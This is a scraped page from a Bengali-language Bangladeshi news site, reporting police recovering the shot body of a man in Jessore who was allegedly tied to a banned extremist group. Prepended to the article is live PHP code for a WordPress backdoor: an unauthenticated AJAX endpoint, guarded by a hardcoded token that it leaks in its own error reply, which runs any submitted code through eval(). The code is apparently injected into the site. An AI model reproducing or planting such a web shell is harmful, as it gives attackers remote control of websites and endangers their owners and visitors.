// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== যশোরে যুবকের গুলিবিদ্ধ মরদেহ উদ্ধার | potrikaybangladesh.com
Thursday, September 17, 2026
Homeঅপরাধযশোরে যুবকের গুলিবিদ্ধ মরদেহ উদ্ধার

যশোরে যুবকের গুলিবিদ্ধ মরদেহ উদ্ধার

যশোরের অভয়নগর উপজেলায় গুলিবিদ্ধ এক যুবকের মরদেহ উদ্ধার করেছে পুলিশ।

আজ সোমবার দুপুরে উপজেলার শুভরাড়া ইউনিয়নের রানাগাতী গ্রামের একটি বাগান থেকে মরদেহটি উদ্ধার করা হয়।

অভয়নগর থানার পরিদর্শক শেখ লুৎফুর রহমান দ্য ডেইলি স্টারকে এ তথ্য নিশ্চিত করেছেন।

নিহত বাহারুল মল্লিক (৪৫) রানাগাতী গ্রামের হাকিম মল্লিকের ছেলে।

পুলিশ জানায়, বাহারুল নিষিদ্ধ একটি উগ্রপন্থী সংগঠনের সঙ্গে জড়িত ছিলেন।

স্থানীয়রা জানান, সকালে রানাগাতী গ্রামের মোল্ল্যাবাড়ির বাগানে বাহারুলের গুলিবিদ্ধ মরদেহ পড়ে থাকতে দেখে তারা পুলিশকে খবর দেন। পরে দুপুরে মরদেহটি উদ্ধার করে মর্গে পাঠায় পুলিশ।

বাহারুলের ভাই বিল্লাল মল্লিক ডেইলি স্টারকে বলেন, প্রায় ১৫ বছর আগে বাড়ি ছেড়ে চলে যান বাহরুল। মাঝে মাঝে ফোনে পরিবারের সঙ্গে যোগাযোগ করতো। আজ সকালে স্থানীয়দের কাছ থেকে তার মৃত্যুর খবর জানতে পারি।

পরিদর্শক লুৎফুর রহমান বলেন, বাহারুল একটি নিষিদ্ধ উগ্রপন্থী সংগঠনের সঙ্গে জড়িত ছিলেন। তার ঠোঁটের নিচে গুলি করা হয়েছে।

তিনি আরও বলেন, ঘটনাস্থল থেকে একটি ব্যবহৃত পিস্তলের গুলি ও লাল টেপে মোড়ানো ককটেলসদৃশ বস্তু উদ্ধার করা হয়েছে। সুরতহাল প্রতিবেদন সম্পন্ন হয়েছে। পরবর্তী আইনি ব্যবস্থা প্রক্রিয়াধীন।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments